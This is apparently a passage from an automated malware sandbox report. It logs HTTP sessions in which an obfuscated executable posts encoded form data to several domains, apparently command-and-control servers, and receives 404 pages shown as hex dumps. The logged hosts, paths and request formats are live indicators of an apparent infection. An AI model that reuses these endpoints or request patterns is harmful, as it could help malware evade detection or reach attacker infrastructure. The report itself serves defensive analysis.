                                                                                                                        Data Raw: 62 42 77 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 44 7a 76 32 63 7a 6f 66 6b 71 46 65 2b 65 69 75 53 4a 78 31 2b 5a 34 32 5a 54 5a 55 61 43 69 6c 4c 71 41 46 49 51 6a 2b 75 33 73 57 74 44 58 63 69 33 53 76 64 56 57 45 6b 4c 72 2f 6e 65 37 4b 58 43 64 41 5a 78 4a 68 45 34 49 6c 71 47 4a 30 6d 52 2f 52 42 30 42 66 59 69 42 48 4e 38 76 6a 31 5a 57 68 4d 54 79 72 6a 74 44 66 71 4b 6e 79 31 36 52 75 63 71 74 5a 41 7a 35 31 6d 6c 41 4e 52 57 73 34 66 53 4f 52 79 4d 43 37 46 67 4a 32 48 50 2b 38 78 48 70 75 35 54 6e 49 57 64 61 79 30 38 4f 73 68 4a 47 52 41 41 37 64 65 78 36 69 48 31 72 33 65 68 36 49 36 4d 2b 48 75 2f 66 70 57 62 4e 57 77 45 6a 31 68 46 51 63 68 6c 58 47 2f 79 45 53 30 76 4c 45 37 73 4d 34 6e 67 47 2f 6a 37 41 7a 33 4d 61 65 6e 59 78 71 7a 79 5a 42 6d 51 30 7a 49 4c 50 44 46 4c 78 6f 6b 47 67 42 77 72 75 45 65 5a 5a 64 2f 56 69 46 37 54 61 41 51 47 72 59 50 65 52 31 53 72 68 53 39 33 79 74 65 34 67 67 6c [TRUNCATED]
                                                                                                                        Data Ascii: bBw=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 [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:23:03.175116062 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:02 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 389
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                        36 | 192.168.2.9 | 50010 | 209.74.77.109 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                        Nov 21, 2024 16:23:04.464939117 CET | 341 | OUT | GET /6gtt/?bBw=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbepy0TXn/sNBWKXnk+HntNHa0bIYL3g==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.gogawithme.live
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:23:05.724932909 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:05 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 389
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                        37 | 192.168.2.9 | 50011 | 161.97.142.144 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                        Nov 21, 2024 16:23:11.495727062 CET | 592 | OUT | POST /jm2l/ HTTP/1.1
                                                                                                                        Host: www.54248711.xyz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.54248711.xyz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.54248711.xyz/jm2l/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 74 7a 6f 72 2b 61 37 63 45 31 4b 56 78 75 79 70 33 69 66 33 49 70 7a 78 44 79 51 76 55 44 56 73 56 62 30 41 35 55 6b 30 4a 6f 6c 5a 47 59 61 73 75 2b 64 39 70 51 74 43 31 50 42 76 47 41 56 35 78 78 59 71 69 63 57 39 6a 64 35 49 6f 75 41 57 54 4d 52 30 69 42 78 37 50 56 4a 4e 2b 42 66 44 34 6a 4b 42 65 34 78 46 58 6c 73 47 6d 2f 30 6f 68 32 4e 74 4e 4e 6d 65 2b 48 6c 78 58 67 77 33 54 5a 56 75 67 68 69 78 55 65 6d 74 64 2b 41 4d 35 33 72 64 33 56 6b 73 2f 36 48 37 55 50 37 5a 35 47 68 6f 4c 58 38 34 66 50 73 34 45 36 52 2f
                                                                                                                        Data Ascii: bBw=B0dCoKtIGqGctzor+a7cE1KVxuyp3if3IpzxDyQvUDVsVb0A5Uk0JolZGYasu+d9pQtC1PBvGAV5xxYqicW9jd5IouAWTMR0iBx7PVJN+BfD4jKBe4xFXlsGm/0oh2NtNNme+HlxXgw3TZVughixUemtd+AM53rd3Vks/6H7UP7Z5GhoLX84fPs4E6R/
                                                                                                                        Nov 21, 2024 16:23:12.848418951 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:12 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: W/"66cce1df-b96"
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                        Nov 21, 2024 16:23:12.848447084 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                        38 | 192.168.2.9 | 50012 | 161.97.142.144 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                        Nov 21, 2024 16:23:14.169044971 CET | 616 | OUT | POST /jm2l/ HTTP/1.1
                                                                                                                        Host: www.54248711.xyz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.54248711.xyz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.54248711.xyz/jm2l/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 32 46 73 57 36 45 41 34 57 41 30 45 49 6c 5a 4d 34 61 74 6a 65 63 51 70 52 51 31 31 4c 42 76 47 41 42 35 78 77 6f 71 69 72 4b 2b 78 64 35 4b 68 4f 41 55 4f 63 52 30 69 42 78 37 50 56 4e 72 2b 46 7a 44 34 53 36 42 63 61 56 47 55 6c 73 5a 68 2f 30 6f 6c 32 4e 54 4e 4e 6d 34 2b 47 34 61 58 6a 49 33 54 59 6c 75 67 30 65 77 66 65 6d 72 54 65 42 4f 39 47 53 30 78 6c 31 31 35 34 71 66 4e 2f 37 79 2b 6e 64 32 61 6c 31 6a 4b 59 73 66 44 64 59 58 61 55 37 51 54 73 2f 44 6b 2f 43 37 6f 39 56 70 6f 6d 38 74 4f 67 3d 3d
                                                                                                                        Data Ascii: bBw=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU2FsW6EA4WA0EIlZM4atjecQpRQ11LBvGAB5xwoqirK+xd5KhOAUOcR0iBx7PVNr+FzD4S6BcaVGUlsZh/0ol2NTNNm4+G4aXjI3TYlug0ewfemrTeBO9GS0xl1154qfN/7y+nd2al1jKYsfDdYXaU7QTs/Dk/C7o9Vpom8tOg==
                                                                                                                        Nov 21, 2024 16:23:15.442529917 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:15 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: W/"66cce1df-b96"
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                        Nov 21, 2024 16:23:15.442589998 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                        39 | 192.168.2.9 | 50013 | 161.97.142.144 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                        Nov 21, 2024 16:23:16.833781958 CET | 1629 | OUT | POST /jm2l/ HTTP/1.1
                                                                                                                        Host: www.54248711.xyz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.54248711.xyz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.54248711.xyz/jm2l/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 31 6c 73 57 4d 51 41 35 32 38 30 46 49 6c 5a 53 6f 61 67 6a 65 64 53 70 52 49 35 31 4c 4e 52 47 44 35 35 77 54 77 71 70 35 69 2b 72 4e 35 4b 2b 65 41 5a 54 4d 52 68 69 42 67 38 50 56 64 72 2b 46 7a 44 34 51 69 42 4b 59 78 47 5a 46 73 47 6d 2f 30 30 68 32 4d 2b 4e 4c 50 4e 2b 47 73 73 58 7a 6f 33 54 34 31 75 7a 57 32 77 44 4f 6d 70 65 2b 42 73 39 48 75 76 78 6c 6f 47 35 38 6a 4b 4e 39 72 79 39 79 6f 53 48 55 64 76 55 4b 6b 77 4b 39 6f 65 43 52 50 45 56 75 6d 6a 7a 4f 75 2f 35 38 51 41 6f 6b 31 2f 53 48 2b 70 75 31 36 38 76 4a 46 48 47 70 51 35 44 2b 59 4a 2f 49 62 48 4d 5a 2b 72 43 6b 49 6f 4d 57 4d 42 65 4f 36 7a 5a 4c 62 59 77 6b 75 74 6a 4a 44 2b 59 55 69 72 6b 56 52 61 7a 7a 54 37 38 4d 62 41 65 71 52 62 59 4d 72 63 59 30 51 61 50 33 38 45 4f 4e 2b 77 71 58 77 4c 67 74 49 54 6e 4d 67 75 31 38 4b 4d 4e 48 2b 48 46 7a 41 55 73 31 75 6a 36 49 77 48 76 58 4f 33 32 76 [TRUNCATED]
                                                                                                                        Data Ascii: bBw=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU1lsWMQA5280FIlZSoagjedSpRI51LNRGD55wTwqp5i+rN5K+eAZTMRhiBg8PVdr+FzD4QiBKYxGZFsGm/00h2M+NLPN+GssXzo3T41uzW2wDOmpe+Bs9HuvxloG58jKN9ry9yoSHUdvUKkwK9oeCRPEVumjzOu/58QAok1/SH+pu168vJFHGpQ5D+YJ/IbHMZ+rCkIoMWMBeO6zZLbYwkutjJD+YUirkVRazzT78MbAeqRbYMrcY0QaP38EON+wqXwLgtITnMgu18KMNH+HFzAUs1uj6IwHvXO32v [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:23:18.152887106 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:17 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: W/"66cce1df-b96"
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                        Nov 21, 2024 16:23:18.152946949 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                        40 | 192.168.2.9 | 50014 | 161.97.142.144 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                        Nov 21, 2024 16:23:19.493277073 CET | 338 | OUT | GET /jm2l/?PBk=f4VDN8Bp14IhbV&bBw=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyg51Tr+0rPqFG3CUyYWI31hnfzG2FIQ== HTTP/1.1
                                                                                                                        Host: www.54248711.xyz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:23:20.782006979 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:20 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Content-Length: 2966
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: "66cce1df-b96"
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
